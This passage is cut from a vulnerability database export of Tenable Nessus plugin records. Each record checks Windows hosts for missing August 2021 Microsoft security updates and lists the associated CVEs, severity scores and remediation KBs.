An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484,\n CVE-2021-36927)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005095-security-only-update-a324fdbb-ce90-4c4d-8d9d-e9f2f2a57e0e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de72daa6\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005090-monthly-rollup-8feea9cd-25f9-41ef-b8e1-815211dc4e6c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?910509c6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005095 or Cumulative Update KB5005090.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005095',\n '5005090'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.0', \n sp:2,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005095, 5005090])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:32:06", "description": "The remote Windows host is missing security update 5005089 or cumulative update 5005088. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-34483, CVE-2021-34484, CVE-2021-34537, CVE-2021-36927)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - A remote code execution vulnerability. 
(CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36947"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005043.NASL", "href": "https://www.tenable.com/plugins/nessus/152434", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152434);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36938\",\n \"CVE-2021-36942\",\n \"CVE-2021-36947\"\n );\n script_xref(name:\"MSKB\", value:\"5005043\");\n script_xref(name:\"MSFT\", value:\"MS21-5005043\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005043: Windows 10 Version 1607 and Windows Server 2016 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005043.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. 
An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34487, CVE-2021-34536,\n CVE-2021-34537)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005043-os-build-14393-4583-709d481e-b02a-4eb9-80d9-75c4b8170240\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e5193663\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005043.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005043'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:14393,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005043])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-21T14:07:27", "description": "The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005033.NASL", "href": "https://www.tenable.com/plugins/nessus/152431", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152431);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26431\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005033\");\n script_xref(name:\"MSFT\", value:\"MS21-5005033\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005033: Windows 10 Version 2004 / Windows 10 Version 20H2 / Windows 10 Version 21H1 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005033.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-26431,\n CVE-2021-34483, CVE-2021-34484, CVE-2021-34486,\n CVE-2021-34487, CVE-2021-34536, CVE-2021-34537,\n CVE-2021-36948)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005033-os-builds-19041-1165-19042-1165-and-19043-1165-b4c77d08-435a-4833-b9f7-e092372079a4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?526975a8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005033.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-08';\nvar kbs = make_list(\n '5005033'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19041,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19042,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005033])\n||\n smb_check_rollup(os:'10', \n sp:0,\n os_build:19043,\n rollup_date:'08_2021',\n bulletin:bulletin,\n 
rollup_kb_list:[5005033])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. 
An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005031: Windows 10 Version 1909 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-04-07T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_AUG_5005031.NASL", "href": "https://www.tenable.com/plugins/nessus/152430", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152430);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/07\");\n\n script_cve_id(\n \"CVE-2021-26424\",\n \"CVE-2021-26425\",\n \"CVE-2021-26426\",\n \"CVE-2021-26432\",\n \"CVE-2021-26433\",\n \"CVE-2021-34480\",\n \"CVE-2021-34481\",\n \"CVE-2021-34483\",\n \"CVE-2021-34484\",\n \"CVE-2021-34486\",\n \"CVE-2021-34487\",\n \"CVE-2021-34530\",\n \"CVE-2021-34533\",\n \"CVE-2021-34534\",\n \"CVE-2021-34535\",\n \"CVE-2021-34536\",\n \"CVE-2021-34537\",\n \"CVE-2021-36926\",\n \"CVE-2021-36932\",\n \"CVE-2021-36933\",\n \"CVE-2021-36936\",\n \"CVE-2021-36937\",\n \"CVE-2021-36947\",\n \"CVE-2021-36948\"\n );\n script_xref(name:\"MSKB\", value:\"5005031\");\n script_xref(name:\"MSFT\", value:\"MS21-5005031\");\n script_xref(name:\"IAVA\", value:\"2021-A-0373-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0374-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/21\");\n\n script_name(english:\"KB5005031: Windows 10 Version 1909 Security Update (August 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005031.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26424,\n CVE-2021-26432, CVE-2021-34530, CVE-2021-34533,\n CVE-2021-34534, CVE-2021-34535, CVE-2021-36936,\n CVE-2021-36937, CVE-2021-36947)\n\n - An elevation of privilege vulnerability. 
An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483,\n CVE-2021-34484, CVE-2021-34486, CVE-2021-34487,\n CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-26433, CVE-2021-36926,\n CVE-2021-36932, CVE-2021-36933)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-34480)\");\n # https://support.microsoft.com/en-us/topic/august-10-2021-kb5005031-os-build-18363-1734-8af726da-a39b-417d-a5fb-670c42d69e78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?819616f3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5005031.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36936\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-08';\nkbs = make_list(\n '5005031'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10', \n sp:0,\n os_build:18363,\n rollup_date:'08_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005031])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:13:14", "description": "The remote Windows host is missing security update 5005030.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. 
(CVE-2021-26424, CVE-2021-26432, CVE-2021-34530, CVE-2021-34533, CVE-2021-34534, CVE-2021-34535, CVE-2021-36936, CVE-2021-36937, CVE-2021-36947)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36942)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-26425, CVE-2021-26426, CVE-2021-34483, CVE-2021-34484, CVE-2021-34486, CVE-2021-34487, CVE-2021-34536, CVE-2021-34537, CVE-2021-36948)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-34480)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-26433, CVE-2021-36926, CVE-2021-36932, CVE-2021-36933, CVE-2021-36938)", "cvss3": {}, "published": "2021-08-10T00:00:00", "type": "nessus", "title": "KB5005030: Windows 10 Version 1809 and Windows Server 2019 Security Update (August 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34481", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", 